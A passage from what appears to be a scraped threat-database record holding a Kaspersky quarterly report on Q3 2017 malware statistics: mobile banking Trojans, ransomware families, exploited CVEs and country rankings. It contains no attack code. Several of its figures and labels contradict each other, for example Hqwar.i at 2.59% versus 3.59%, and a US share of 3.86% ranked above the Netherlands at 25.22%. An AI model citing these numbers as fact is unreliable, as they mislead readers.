PDF)**](<https://ics-cert.kaspersky.com/media/KL_ICS_REPORT_H2-2017_FINAL_EN_22032018.pdf>)", "modified": "2018-03-26T10:00:27", "published": "2018-03-26T10:00:27", "id": "SECURELIST:D257E8B7FC070ED8409973F0F9A689E6", "href": "https://securelist.com/threat-landscape-for-industrial-automation-systems-in-h2-2017/85053/", "type": "securelist", "title": "Threat Landscape for Industrial Automation Systems in H2 2017", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2017-11-10T11:33:49", "bulletinFamily": "blog", "cvelist": ["CVE-2017-0199", "CVE-2017-7269", "CVE-2017-8570", "CVE-2017-8759"], "description": "\n\n## Q3 figures\n\nAccording to KSN data, Kaspersky Lab solutions detected and repelled **277,646,376 **malicious attacks from online resources located in 185 countries all over the world.\n\n**72,012,219** unique URLs were recognized as malicious by web antivirus components.\n\nAttempted infections by malware that aims to steal money via online access to bank accounts were registered on **204,388** user computers.\n\nCrypto ransomware attacks were blocked on **186283 **computers of unique users.\n\nKaspersky Lab's file antivirus detected a total of **198,228,428** unique malicious and potentially unwanted objects.\n\nKaspersky Lab mobile security products detected:\n\n * **1,598,196 **malicious installation packages;\n * **19,748** mobile banking Trojans (installation packages);\n * **108,073** mobile ransomware Trojans (installation packages).\n\n## Mobile threats\n\n### Q3 events\n\n#### The spread of the Asacub banker\n\nIn the third quarter, we continued to monitor the activity of the mobile banking Trojan Trojan-Banker.AndroidOS.Asacub that actively spread via SMS spam. Q3 saw cybercriminals carry out a major campaign to distribute the Trojan, resulting in a tripling of the number of users attacked. Asacub activity peaked in July, after which there was a decline in the number of attacks: in September we registered almost three times fewer attacked users than in July.\n\n[](<https://securelist.com/files/2017/11/q3-2017-statistics-1-en.jpg>)\n\nNumber of unique users attacked by Trojan-Banker.AndroidOS.Asacub in Q2 and Q3 2017\n\n#### New capabilities of mobile banking Trojans\n\nQ3 2017 saw two significant events in the world of mobile banking Trojans.\n\nFirstly, the family of mobile banking Trojans Svpeng has acquired the [new modification Trojan-Banker.AndroidOS.Svpeng.ae](<https://securelist.com/a-new-era-in-mobile-banking-trojans/79198/>) capable of granting all the necessary rights to itself and stealing data from other applications. To do this, it just needs to persuade the user to allow the Trojan to utilize special functions designed for people with disabilities. As a result, the Trojan can intercept text that a user is entering, steal text messages and even prevent itself from being removed.\n\nInterestingly, in August we discovered yet another modification of Svpeng that uses special features. Only, this time the Trojan was not banking related \u2013 instead of stealing data, it encrypts all the files on a device and demands a ransom in bitcoins.\n\n[](<https://securelist.com/files/2017/11/q3-2017-statistics-2.jpg>)\n\nTrojan-Banker.AndroidOS.Svpeng.ag. window containing ransom demand\n\nSecondly, the FakeToken family of mobile banking Trojans [has expanded the list of apps it attacks](<https://securelist.com/booking-a-taxi-for-faketoken/81457/>). If previously representatives of this family mostly overlaid banking and some Google apps (e.g. Google Play Store) with a phishing window, it is now also overlaying apps used to book taxis, air tickets and hotels. The aim of the Trojan is to harvest data from bank cards.\n\n#### The growth of WAP billing subscriptions\n\nIn the third quarter of 2017, we continued to monitor the increased activity of Trojans designed to [steal](<https://securelist.com/wap-billing-trojan-clickers-on-rise/81576/>) users' money via subscriptions. To recap, these are Trojans capable of visiting sites that allow users to pay for services by deducting money from their mobile phone accounts. These Trojans can usually click buttons on such sites using special JS files, and thus make payments without the user's knowledge.\n\nOur Top 20 most popular Trojan programs in Q3 2017 included three malware samples that attack WAP subscriptions. They are Trojan-Dropper.AndroidOS.Agent.hb and Trojan.AndroidOS.Loapi.b in fourth and fifth, and Trojan-Clicker.AndroidOS.Ubsod.b in seventh place.\n\n### Mobile threat statistics\n\nIn the third quarter of 2017, Kaspersky Lab detected 1,598,196 malicious installation packages, which is 1.2 times more than in the previous quarter.\n\n[](<https://securelist.com/files/2017/11/q3-2017-statistics-3-en.jpg>)\n\nNumber of detected malicious installation packages (Q4 2016 \u2013 Q3 2017)\n\n#### Distribution of mobile malware by type\n\n[](<https://securelist.com/files/2017/11/q3-2017-statistics-4-en.jpg>)\n\nDistribution of new mobile malware by type (Q2 and Q3 2017)\n\nRiskTool (53.44%) demonstrated the highest growth in Q3 2017, with its share increasing by 12.93 percentage points (p.p.). The majority of all installation packages discovered belonged to the RiskTool.AndroidOS.Skymobi family.\n\nTrojan-Dropper malware (10.97%) came second in terms of growth rate: its contribution increased by 6.29 p.p. Most of the installation packages are detected as Trojan-Dropper.AndroidOS.Agent.hb.\n\nThe share of Trojan-Ransom programs, which was first in terms of the growth rate in the first quarter of 2017, continued to fall and accounted for 6.69% in Q3, which is 8.4 p.p. less than the previous quarter. The percentage of Trojan-SMS malware also fell considerably to 2.62% \u2013 almost 4 p.p. less than in Q2.\n\nIn Q3, Trojan-Clicker malware broke into this rating after its contribution increased from 0.29% to 1.41% in the space of three months.\n\n#### TOP 20 mobile malware programs\n\n_Please note that this rating of malicious programs does not include potentially dangerous or unwanted programs such as RiskTool or adware._\n\n| Verdict | % of attacked users* \n---|---|--- \n1 | DangerousObject.Multi.Generic | 67.14 \n2 | Trojan.AndroidOS.Boogr.gsh | 7.52 \n3 | Trojan.AndroidOS.Hiddad.ax | 4.56 \n4 | Trojan-Dropper.AndroidOS.Agent.hb | 2.96 \n5 | Trojan.AndroidOS.Loapi.b | 2.91 \n6 | Trojan-Dropper.AndroidOS.Hqwar.i | 2.59 \n7 | Trojan-Clicker.AndroidOS.Ubsod.b | 2.20 \n8 | Backdoor.AndroidOS.Ztorg.c | 2.09 \n9 | Trojan.AndroidOS.Agent.gp | 2.05 \n10 | Trojan.AndroidOS.Sivu.c | 1.98 \n11 | Trojan.AndroidOS.Hiddapp.u | 1.87 \n12 | Backdoor.AndroidOS.Ztorg.a | 1.68 \n13 | Trojan.AndroidOS.Agent.ou | 1.63 \n14 | Trojan.AndroidOS.Triada.dl | 1.57 \n15 | Trojan-Ransom.AndroidOS.Zebt.a | 1.57 \n16 | Trojan-Dropper.AndroidOS.Hqwar.gen | 1.53 \n17 | Trojan.AndroidOS.Hiddad.an | 1.48 \n18 | Trojan.AndroidOS.Hiddad.ci | 1.47 \n19 | Trojan-Banker.AndroidOS.Asacub.ar | 1.41 \n20 | Trojan.AndroidOS.Agent.eb | 1.29 \n \n_* Percentage of unique users attacked by the malware in question, relative to all users of Kaspersky Lab's mobile security product that were attacked._\n\nFirst place was occupied by DangerousObject.Multi.Generic (67.14%), the verdict used for malicious programs detected using cloud technologies. This is basically how the very latest malware is detected.\n\nAs in the previous quarter, Trojan.AndroidOS.Boogr.gsh (7.52%) came second. This verdict is issued for files recognized as malicious by our system based on machine learning.\n\nTrojan.AndroidOS.Hiddad.an (4.56%) was third. The main purpose of this Trojan is to open and click advertising links received from the C&C. The Trojan requests administrator rights to prevent its removal.\n\nTrojan-Dropper.AndroidOS.Agent.hb (2.96%) climbed from sixth in Q2 to fourth this quarter. This Trojan decrypts and runs another Trojan \u2013 a representative of the Loaipi family. One of them \u2013Trojan.AndroidOS.Loapi.b \u2013 came fifth in this quarter's Top 20. This is a complex modular Trojan whose main malicious component needs to be downloaded from the cybercriminals' server. We can assume that Trojan.AndroidOS.Loapi.b is designed to steal money via paid subscriptions.\n\nTrojan-Dropper.AndroidOS.Hqwar.i (3.59%), the verdict used for Trojans protected by a certain packer/obfuscator, fell from fourth to sixth. In most cases, this name indicates representatives of the [FakeToken ](<https://threats.kaspersky.com/en/threat/Trojan-Banker.AndroidOS.Faketoken>)and [Svpeng ](<https://threats.kaspersky.com/en/threat/Trojan-Banker.AndroidOS.Svpeng>)mobile banking families.\n\nIn seventh was Trojan-Clicker.AndroidOS.Ubsod.b, a small basic Trojan that receives links from a C&C and opens them. We wrote about this family in more detail in our [review of Trojans](<https://securelist.com/wap-billing-trojan-clickers-on-rise/81576/>) that steal money using WAP subscriptions.\n\nTrojan Backdoor.AndroidOS.Ztorg.c came eighth. This is one of the most active advertising Trojans that uses superuser rights. In the third quarter of 2017, our Top 20 included eight Trojans that try to obtain or use root rights and which make use of advertising as their main means of monetization. Their goal is to deliver ads to the user more aggressively, applying (among other methods) hidden installation of new advertising programs. At the same time, superuser privileges help them 'hide' in the system folder, making it very difficult to remove them. It's worth noting that the quantity of this type of malware in the Top 20 has been decreasing (in Q1 2017, there were 14 of these Trojans in the rating, while in Q2 the number was 11).\n\nTrojan.AndroidOS.Agent.gp (2.05%), which steals money from users making calls to premium numbers, rose from fifteenth to ninth. Due to its use of administrator rights, it resists attempts to remove it from an infected device.\n\nOccupying fifteenth this quarter was Trojan-Ransom.AndroidOS.Zebt.a, the first ransom Trojan in this Top 20 rating in 2017. This is a fairly simple Trojan whose main goal is to block the device with its window and demand a ransom. Zebt.a tends to attack users in Europe and Mexico.\n\nTrojan.AndroidOS.Hiddad.an (1.48%) fell to sixteenth after occupying second and third in the previous two quarters. This piece of malware imitates various popular games or programs. Interestingly, once run, it downloads and installs the application it imitated. In this case, the Trojan requests administrator rights to withstand removal. The main purpose of Trojan.AndroidOS.Hiddad.an is the aggressive display of adverts. Its main 'audience' is in Russia.\n\n#### The geography of mobile threats\n\n[](<https://securelist.com/files/2017/11/q3-2017-statistics-5-en.jpg>)\n\nThe geography of attempted mobile malware infections in Q3 2017 (percentage of all users attacked)\n\n**Top 10 countries attacked by mobile malware (ranked by percentage of users attacked):**\n\n| Country* | % of attacked users** \n---|---|--- \n1 | Iran | 35.12 \n2 | Bangladesh | 28.30 \n3 | China | 27.38 \n4 | C\u00f4te d'Ivoire | 26.22 \n5 | Algeria | 24.78 \n6 | Nigeria | 23.76 \n7 | Indonesia | 22.29 \n8 | India | 21.91 \n9 | Nepal | 20.78 \n10 | Kenya | 20.43 \n \n_* We eliminated countries from this rating where the number of users of Kaspersky Lab's mobile security product is relatively low (under 10,000). \n** Percentage of unique users attacked in each country relative to all users of Kaspersky Lab's mobile security product in the country._\n\nFor the third quarter in a row Iran was the country with the highest percentage of users attacked by mobile malware \u2013 35.12%. Bangladesh came second, with 28.3% of users there encountering a mobile threat at least once during Q3. China (27.38%) followed in third.\n\nRussia (8.68%) came 35th this quarter (vs 26th place in Q2), France (4.9%) was 59th, the US (3.8%) 67th, Italy (5.3%) 56th, Germany (2.9%) 79th, and the UK (3.4%) 72nd.\n\nThe safest countries were Georgia (2.2%), Denmark (1.9%), and Japan (0.8%).\n\n#### Mobile banking Trojans\n\nOver the reporting period we detected 19,748 installation packages for mobile banking Trojans, which is 1.4 times less than in Q2 2017.\n\n[](<https://securelist.com/files/2017/11/q3-2017-statistics-6-en.jpg>)\n\nNumber of installation packages for mobile banking Trojans detected by Kaspersky Lab solutions (Q4 2016 \u2013 Q3 2017)\n\nBanker.AndroidOS.Asacub.ar became the most popular mobile banking Trojan in Q3, replacing the long-term leader Trojan-Banker.AndroidOS.Svpeng.q. These mobile banking Trojans use phishing windows to steal credit card data and logins and passwords for online banking accounts. In addition, they steal money via SMS services, including mobile banking.\n\n[](<https://securelist.com/files/2017/11/q3-2017-statistics-7-en.jpg>)\n\nGeography of mobile banking threats in Q3 2017 (percentage of all users attacked)\n\n**Top 10 countries attacked by mobile banker Trojans (ranked by percentage of users attacked):**\n\n| Country* | % of attacked users** \n---|---|--- \n1 | Russia | 1.20 \n2 | Uzbekistan | 0.40 \n3 | Kazakhstan | 0.36 \n4 | Tajikistan | 0.35 \n5 | Turkey | 0.34 \n6 | Moldova | 0.31 \n7 | Ukraine | 0.29 \n8 | Kyrgyzstan | 0.27 \n9 | Belarus | 0.26 \n10 | Latvia | 0.23 \n \n_* We eliminated countries from this rating where the number of users of Kaspersky Lab's mobile security product is relatively low (under 10,000). \n** Percentage of unique users in each country attacked by mobile banker Trojans, relative to all users of Kaspersky Lab's mobile security product in the country._\n\nIn Q3 2017, the Top 10 countries attacked by mobile banker Trojans saw little change: Russia (1.2%) topped the ranking again. In second and third places were Uzbekistan (0.4%) and Kazakhstan (0.36%), which came fifth and tenth respectively in the previous quarter. In these countries the Faketoken.z, Tiny.b and Svpeng.y families were the most widespread threats.\n\nOf particular interest is the fact that Australia, a long-term resident at the top end of this rating, didn't make it into our Top 10 this quarter. This was due to a decrease in activity by the [Trojan-Banker.AndroidOS.Acecard](<https://securelist.com/the-evolution-of-acecard/73777/>) and Trojan-Banker.AndroidOS.Marcher mobile banking families.\n\n#### Mobile ransomware\n\nIn Q3 2017, we detected 108,073 mobile Trojan-Ransomware installation packages, which is almost half as much as in the previous quarter.\n\n[](<https://securelist.com/files/2017/11/q3-2017-statistics-8-en.jpg>)\n\nNumber of mobile Trojan-Ransomware installation packages detected by Kaspersky Lab (Q3 2016 \u2013 Q3 2017)\n\nIn our report for Q2, [we wrote](<https://securelist.com/it-threat-evolution-q2-2017-statistics/79432/>) that in the first half of 2017, we had discovered more mobile ransomware installation packages than in any other period. The reason was the Trojan-Ransom.AndroidOS.Congur family. However, in the third quarter of this year we observed a decline in this family's activity.\n\nTrojan-Ransom.AndroidOS.Zebt.a became the most popular mobile Trojan-Ransomware in Q3, accounting for more than a third of users attacked by mobile ransomware. Second came Trojan-Ransom.AndroidOS.Svpeng.ab. Meanwhile, [Trojan-Ransom.AndroidOS.Fusob.h](<https://securelist.com/mobile-malware-evolution-2015/73839/>), which topped the rating for several quarters in a row, was only third in Q3 2017.\n\n[](<https://securelist.com/files/2017/11/q3-2017-statistics-9-en.jpg>)\n\nGeography of mobile Trojan-Ransomware in Q3 2017 (percentage of all users attacked)\n\n**Top 10 countries attacked by mobile Trojan-Ransomware (ranked by percentage of users attacked):**\n\n1 | US | 1.03% \n---|---|--- \n2 | Mexico | 0.91% \n3 | Belgium | 0.85% \n4 | Kazakhstan | 0.79% \n5 | Romania | 0.70% \n6 | Italy | 0.50% \n7 | China | 0.49% \n8 | Poland | 0.49% \n9 | Austria | 0.45% \n10 | Spain | 0.33% \n \n_* We eliminated countries from this ranking where the number of users of Kaspersky Lab's mobile security product is lower than 10,000. \n** Percentage of unique users in each country attacked by mobile Trojan-Ransomware, relative to all users of Kaspersky Lab's mobile security product in the country._\n\nThe US (1.03%) again topped the rating of countries attacked most by mobile Trojan-Ransomware; the most widespread family in the country was Trojan-Ransom.AndroidOS.Svpeng. These Trojans appeared in 2014 as a modification of the Trojan-Banker.AndroidOS.Svpeng mobile banking family. They demand a ransom of about $500 from victims to unblock their devices.\n\nIn Mexico (0.91%), which came second in Q3 2017, most mobile ransomware attacks involved Trojan-Ransom.AndroidOS.Zebt.a. Belgium (0.85%) came third, with Zebt.a the main threat to users there too.\n\n## Vulnerable apps exploited by cybercriminals\n\nQ3 2017 saw continued growth in the number of attacks launched against users involving malicious Microsoft Office documents. We noted the emergence of a large number of combined documents containing an exploit as well as a phishing message \u2013 in case the embedded exploit fails.\n\nAlthough two new Microsoft Office vulnerabilities, CVE-2017-8570 and CVE-2017-8759, have emerged, cybercriminals have continued to exploit CVE-2017-0199, a logical vulnerability in processing HTA objects that was discovered in March 2017. Kaspersky Lab statistics show that attacks against 65% users in Q3 exploited CVE-2017-0199, and less than 1% exploited CVE-2017-8570 or CVE-2017-8759. The overall share of exploits for Microsoft Office was 27.8%.\n\nThere were no large network attacks (such as [WannaCry](<https://securelist.com/wannacry-ransomware-used-in-widespread-attacks-all-over-the-world/78351/>) or [ExPetr](<https://securelist.com/from-blackenergy-to-expetr/78937/>)) launched in Q3 using vulnerabilities patched by the MS17-010 update. However, according to KSN data, there was major growth throughout the quarter in the number of attempted exploitations of these vulnerabilities that were blocked by our Intrusion Detection System component. Unsurprisingly, the most popular exploits have been EternalBlue and its modifications, which use an SMB protocol vulnerability; however, KL statistics show that EternalRomance, EternalChampion and an exploit for the CVE-2017-7269 vulnerability in IIS web servers have also been actively used by cybercriminals. EternalBlue, however, accounts for millions of blocked attempted attacks per month, while the numbers for other exploits are much lower.\n\n[](<https://securelist.com/files/2017/11/q3-2017-statistics-10-en.jpg>)\n\nDistribution of exploits used in attacks by type of application attacked, Q3 2017\n\nThe distribution of exploits by the type of attacked application this quarter was practically the same as in Q2. First place is still occupied by exploits targeting browsers and browser components with a share of 35.0% (a decline of 4 p.p. compared to Q2.) The proportion of exploits targeting Android vulnerabilities (22.7%) was almost identical to that in Q2, placing this type of attacked application once again in third behind Office vulnerabilities.\n\n## Online threats (Web-based attacks)\n\n_These statistics are based on detection verdicts returned by the web antivirus module that protects users at the moment when malicious objects are downloaded from a malicious/infected web page. Malicious sites are specifically created by cybercriminals; infected web resources include those whose content is created by users (e.g. forums), as well as legitimate resources._\n\n### Online threats in the banking sector\n\n_These statistics are based on detection verdicts of Kaspersky Lab products, received from users of Kaspersky Lab products who have consented to provide their statistical data. Beginning from the first quarter of 2017 these statistics include malicious programs for ATMs and POS terminals, but do not include mobile threats._\n\nIn Q3 2017, Kaspersky Lab solutions blocked attempts to launch one or more malicious programs capable of stealing money via online banking on 204,388 computers.\n\n[](<https://securelist.com/files/2017/11/q3-2017-statistics-11-en.jpg>)\n\nNumber of users attacked by financial malware, Q3 2017\n\n#### Geography of attacks\n\nTo evaluate and compare the risk of being infected by banking Trojans and ATM and POS-malware worldwide, we calculate the percentage of Kaspersky Lab product users in the country who encountered this type of threat during the reporting period, relative to all users of our products in that country.\n\n[](<https://securelist.com/files/2017/11/q3-2017-statistics-12-en.jpg>)\n\nGeography of banking malware attacks in Q3 2017 (percentage of all users attacked)\n\n**TOP 10 countries attacked by mobile banker Trojans (ranked by percentage of users attacked)**\n\n| Country* | % of users attacked** \n---|---|--- \n**1** | Togo | 2.30 \n**2** | China | 1.91 \n**3** | Taiwan | 1.65 \n**4** | Indonesia | 1.58 \n**5** | South Korea | 1.56 \n**6** | Germany | 1.53 \n**7** | United Arab Emirates | 1.52 \n**8** | Lebanon | 1.48 \n**9** | Libya | 1.43 \n**10** | Jordan | 1.33 \n \n_These statistics are based on detection verdicts returned by the antivirus module, received from users of Kaspersky Lab products who have consented to provide their statistical data. \n* We excluded those countries in which the number of Kaspersky Lab product users is relatively small (under 10,000). \n** Unique users whose computers have been targeted by banking Trojan malware attacks as a percentage of all unique users of Kaspersky Lab products in the country._\n\n#### TOP 10 banking malware families\n\nThe table below shows the Top 10 malware families used in Q3 2017 to attack online banking users (in terms of percentage of users attacked):\n\n| Name* | % of attacked users** \n---|---|--- \n**1** | Trojan-Spy.Win32.Zbot | 27.9 \n**2** | Trojan.Win32.Nymaim | 20.4 \n**3** | Trojan.Win32.Neurevt | 10.0 \n**4** | Trickster | 9.5 \n**5** | SpyEye | 7.5 \n**6** | Caphaw | 6.3 \n**7** | Trojan-Banker.Win32.Gozi | 2.0 \n**8** | Shiz | 1.8 \n**9** | ZAccess | 1.6 \n**10** | NeutrinoPOS | 1.6 \n \n_* The detection verdicts of Kaspersky Lab products, received from users of Kaspersky Lab products who have consented to provide their statistical data. \n** Unique users whose computers have been targeted by the malware in question as a percentage of all users attacked by financial malware._\n\nThe malware families Dridex and Tinba lost their places in this quarter's Top 10. One of their former positions was occupied by the Trickster bot (accounting for 9.5% of attacked users), also known as TrickBot, a descendant of the now defunct Dyre banker. There was a small change in the leading three malicious families. First and second places are still occupied by Trojan-Spy.Win32.Zbot (27.9%) and Trojan.Win32.Nymaim (20.4%) respectively, while third place is now occupied by Trojan.Win32.Neurevt (10%) whose share grew by nearly 4 p.p.\n\n### Cryptoware programs\n\n#### Q3 highlights\n\n##### Crysis rises from the dead\n\nIn our Q2 report [we wrote](<https://securelist.com/it-threat-evolution-q2-2017-statistics/79432/>) that the cybercriminals behind the Crysis ransomware cryptor halted distribution of the malware and published the secret keys needed to decrypt files. This took place in May 2017, and all propagation of the ransomware was stopped completely at that time.\n\nHowever, nearly three months later, in mid-August, we discovered that this Trojan had come back from the dead and had set out on a new campaign of active propagation. The email addresses used by the blackmailers were different from those used in earlier samples of Crysis. A detailed analysis revealed that the new samples of the Trojan were completely identical to the old ones apart from just one thing \u2013 the public master keys were new. Everything else was the same, including the compilation timestamp in the PE header and, more interestingly, the labels that the Trojan leaves in the service area at the end of each encrypted file. Closer scrutiny of the samples suggests that the new distributors of the malware didn't have the source code, so they just took its old body and used a HEX editor to change the key and the contact email.\n\nThe above suggests that this piece of 'zombie' malware is being spread by a different group of malicious actors rather than its original developer who disclosed all the private keys in May.\n\n##### Surge in Cryrar attacks\n\nThe Cryrar cryptor (aka ACCDFISA) is a veteran among the ransomware Trojans that are currently being spread. It emerged way back in 2012 and has been active ever since. The cryptor is written in PureBasic and uses a legitimate executable RAR archiver file to place the victim's files in password-encrypted RAR-sfx archives.\n\nIn the first week of September 2017 we recorded a dramatic rise in the number of attempted infections with Cryrar \u2013 a surge never seen before or since. The malicious actors used the following approach: they crack the password to RDP by brute force, get authentication on the victim's system using the remote access protocol and manually launch the Trojan's installation file. The latter, in turn, installs the cryptor's body and the components it requires (including the renamed RAR.EXE file), and then automatically launches the cryptor.\n\nAccording to KSN data, this wave of attacks primarily targeted Vietnam, China, the Philippines and Brazil.\n\n##### Master key to original versions of Petya/Mischa/GoldenEye published\n\nIn July 2017, the authors of the [Petya Trojan](<https://securelist.com/petya-the-two-in-one-trojan/74609/>) published their master key, which can be used to decrypt the Salsa keys required to decrypt MFT and unblock access to systems affected by Petya/Mischa or GoldenEye.\n\nThis happened shortly after the [ExPetr epidemic](<https://securelist.com/schroedingers-petya/78870/>) which used part of the GoldenEye code. This suggests that the authors of Petya/Mischa/GoldenEye did so in an attempt to distance themselves from the ExPetr attack and the outcry that it caused.\n\nUnfortunately, this master key won't help those affected by ExPetr, as its creators [didn't include](<https://securelist.com/expetrpetyanotpetya-is-a-wiper-not-ransomware/78902/>) the option of restoring a Salsa key to decrypt MFT.\n\n#### The number of new modifications\n\nIn Q3 2017, we identified five new ransomware families in this classification. It's worth noting here that this number doesn't include all the Trojans that weren't assigned their own 'personal' verdict. Each quarter, dozens of these malicious programs emerge, though they either have so few distinctive characteristics or occur so rarely that they and the hundreds of others like them remain nameless, and are detected with generic verdicts.\n\n[](<https://securelist.com/files/2017/11/q3-2017-statistics-13-en.jpg>)\n\nNumber of newly created cryptor modifications, Q3 2016 \u2013 Q3 2017\n\nThe number of new cryptor modifications continues to decline compared to previous quarters. This could be a temporary trend, or could indicate that cybercriminals are gradually losing their interest in cryptors as a means of making money, and are switching over to other types of malware.\n\n#### The number of users attacked by ransomware\n\nJuly was the month with the lowest ransomware activity. From July to September, the number of ransomware attacks rose, though it remained lower than May and June when two massive epidemics (WannaCry and ExPetr) struck.\n\n[](<https://securelist.com/files/2017/11/q3-2017-statistics-14-en.jpg>)\n\nNumber of unique users attacked by Trojan-Ransom cryptor malware (Q3 2017)\n\n#### The geography of attacks\n\n[](<https://securelist.com/files/2017/11/q3-2017-statistics-15-en.jpg>)\n\n#### Top 10 countries attacked by cryptors\n\n| **Country*** | **% of users attacked by cryptors**** \n---|---|--- \n1 | Myanmar | 0.95% \n2 | Vietnam | 0.92% \n3 | Indonesia | 0.69% \n4 | Germany | 0.62% \n5 | China | 0.58% \n6 | Russia | 0.51% \n7 | Philippines | 0.50% \n8 | Venezuela | 0.50% \n9 | Cambodia | 0.50% \n10 | Austria | 0.49% \n \n_* We excluded those countries where the number of Kaspersky Lab product users is relatively small (under 50,000) \n** Unique users whose computers have been targeted by ransomware as a percentage of all unique users of Kaspersky Lab products in the country._\n\nMost of the countries in this Top 10 are from Asia, including Myanmar (0.95%), a newcomer to the Top 10 that swept into first place in Q3. Vietnam (0.92%) came second, moving up two places from Q2, while China (0.58%) rose one place to fifth.\n\nBrazil, Italy and Japan were the leaders in Q2, but in Q3 they failed to make it into the Top 10. Europe is represented by Germany (0.62%) and Austria (0.49%).\n\nRussia, in tenth the previous quarter, ended Q3 in sixth place.\n\n#### Top 10 most widespread cryptor families\n\n| **Name** | **Verdict*** | **% of attacked users**** \n---|---|---|--- \n1 | WannaCry | Trojan-Ransom.Win32.Wanna | 16.78% | \n2 | Crypton | Trojan-Ransom.Win32.Cryptoff | 14.41% | \n3 | Purgen/GlobeImposter | Trojan-Ransom.Win32.Purgen | 6.90% | \n4 | Locky | Trojan-Ransom.Win32.Locky | 6.78% | \n5 | Cerber | Trojan-Ransom.Win32.Zerber | 4.30% | \n6 | Cryrar/ACCDFISA | Trojan-Ransom.Win32.Cryrar | 3.99% | \n7 | Shade | Trojan-Ransom.Win32.Shade | 2.69% | \n8 | Spora | Trojan-Ransom.Win32.Spora | 1.87% | \n9 | (generic verdict) | Trojan-Ransom.Win32.Gen | 1.77% | \n10 | (generic verdict) | Trojan-Ransom.Win32.CryFile | 1.27% | \n \n_* These statistics are based on detection verdicts received from users of Kaspersky Lab products who have consented to provide their statistical data. \n** Unique users whose computers have been targeted by a specific Trojan-Ransom family as a percentage of all users of Kaspersky Lab products attacked by Trojan-Ransom malware._\n\nWannacry (16.78%) tops the rating for Q3, and the odds are that it's set to remain there: the worm has been propagating uncontrollably, and there are still huge numbers of computers across the globe with the unpatched vulnerability that Wannacry exploits.\n\nCrypton (14.41%) came second. This cryptor emerged in spring 2016 and has undergone many modifications since. It has also been given multiple names: CryptON, JuicyLemon, PizzaCrypts, Nemesis, x3m, Cry9, Cry128, Cry36.\n\nThe cryptor Purgen (6.90%) rounds off the top three after rising from ninth. The rest of the rating is populated by 'old timers' \u2013 the Trojans Locky, Cerber, Cryrar, Shade, and Spora.\n\nThe Jaff cryptor appeared in the spring of 2017, going straight into fourth place in the Q2 rating, and then stopped spreading just as suddenly.\n\n### Top 10 countries where online resources are seeded with malware\n\n_The following statistics are based on the physical location of the online resources used in attacks and blocked by our antivirus components (web pages containing redirects to exploits, sites containing exploits and other malware, botnet command centers, etc.). Any unique host could be the source of one or more web attacks. In order to determine the geographical source of web-based attacks, domain names are matched against their actual domain IP addresses, and then the geographical location of a specific IP address (GEOIP) is established._\n\nIn the third quarter of 2017, Kaspersky Lab solutions blocked **277,646,376** attacks launched from web resources located in 185 countries around the world. **72,012,219** unique URLs were recognized as malicious by web antivirus components.\n\n[](<https://securelist.com/files/2017/11/q3-2017-statistics-16-en.jpg>)\n\nDistribution of web attack sources by country, Q3 2017\n\nIn Q3 2017, the US (3.86%) was home to most sources of web attacks. The Netherlands (25.22%) remained in second place, while Germany moved up from fifth to third. Finland and Singapore dropped out of the top five and were replaced by Ireland (1.36%) and Ukraine (1.36%).\n\n**Countries where users faced the greatest risk of online infection**\n\nIn order to assess the risk of online infection faced by users in different countries, we calculated the percentage of Kaspersky Lab users in each country who encountered detection verdicts on their machines during the quarter. The resulting data provides an indication of the aggressiveness of the environment in which computers work in different countries.\n\nThis rating only includes attacks by malicious programs that fall under the **_Malware_** class. The rating does not include web antivirus module detections of potentially dangerous or unwanted programs such as RiskTool or adware.\n\n| **Country*** | **% of users attacked**** \n---|---|--- \n1 | Belarus | 27.35 \n2 | Algeria | 24.23 \n3 | Russia | 23.91 \n4 | Armenia | 23.74 \n5 | Moldova | 23.61 \n6 | Greece | 21.48 \n7 | Azerbaijan | 21.14 \n8 | Kyrgyzstan | 20.83 \n9 | Uzbekistan | 20.24 \n10 | Albania | 20.10 \n11 | Ukraine | 19.82 \n12 | Kazakhstan | 19.55 \n13 | France | 18.94 \n14 | Venezuela | 18.68 \n15 | Brazil | 18.01 \n16 | Portugal | 17.93 \n17 | Vietnam | 17.81 \n18 | Tajikistan | 17.63 \n19 | Georgia | 17.50 \n20 | India | 17.43 \n \n_These statistics are based on detection verdicts returned by the web antivirus module, received from users of Kaspersky Lab products who have consented to provide their statistical data._ \n_* These calculations excluded countries where the number of Kaspersky Lab users is relatively small (under 10,000 users). \n** Unique users whose computers have been targeted by **Malware-class** attacks as a percentage of all unique users of Kaspersky Lab products in the country._\n\nOn average, 16.61% of computers connected to the Internet globally were subjected to at least one **Malware-class** web attack during the quarter.\n\n[](<https://securelist.com/files/2017/11/q3-2017-statistics-17-en.jpg>)\n\nGeography of malicious web attacks in Q3 2017 (ranked by percentage of users attacked)\n\nThe countries with the safest online surfing environments included Iran (9.06%), Singapore (8.94%), Puerto Rico (6.67%), Niger (5.14%) and Cuba (4.44%).\n\n## Local threats\n\n_Local infection statistics for user computers are a very important indicator: they reflect threats that have penetrated computer systems by infecting files or removable media, or initially got on the computer in an encrypted format (for example, programs integrated in complex installers, encrypted files, etc.)._\n\n_Data in this section is based on analyzing statistics produced by antivirus scans of files on the hard drive at the moment they were created or accessed, and the results of scanning removable storage media._\n\nIn Q3 2017, Kaspersky Lab's file antivirus detected **198,228,428** unique malicious and potentially unwanted objects.\n\n**Countries where users faced the highest risk of local infection**\n\nFor each country, we calculated the percentage of Kaspersky Lab product users on whose computers the file antivirus was triggered during the quarter. These statistics reflect the level of personal computer infection in different countries.\n\nThe rating of malicious programs only includes **Malware-class** attacks. The rating does not include web antivirus module detections of potentially dangerous or unwanted programs such as RiskTool or adware.\n\n| **Country*** | **% of users attacked**** \n---|---|--- \n1 | Yemen | 56.89 \n2 | Vietnam | 54.32 \n3 | Afghanistan | 53.25 \n4 | Uzbekistan | 53.02 \n5 | Laos | 52.72 \n6 | Tajikistan | 49.72 \n7 | Ethiopia | 48.90 \n8 | Syria | 47.71 \n9 | Myanmar | 46.82 \n10 | Cambodia | 46.69 \n11 | Iraq | 45.79 \n12 | Turkmenistan | 45.47 \n13 | Libya | 45.00 \n14 | Bangladesh | 44.54 \n15 | China | 44.40 \n16 | Sudan | 44.27 \n17 | Mongolia | 44.18 \n18 | Mozambique | 43.84 \n19 | Rwanda | 43.22 \n20 | Belarus | 42.53 \n \n_These statistics are based on detection verdicts returned by on-access and on-demand antivirus modules, received from users of Kaspersky Lab products who have consented to provide their statistical data. The data include detections of malicious programs located on users' computers or on removable media connected to the computers, such as flash drives, camera and phone memory cards, or external hard drives._ \n_* These calculations exclude countries where the number of Kaspersky Lab users is relatively small (under 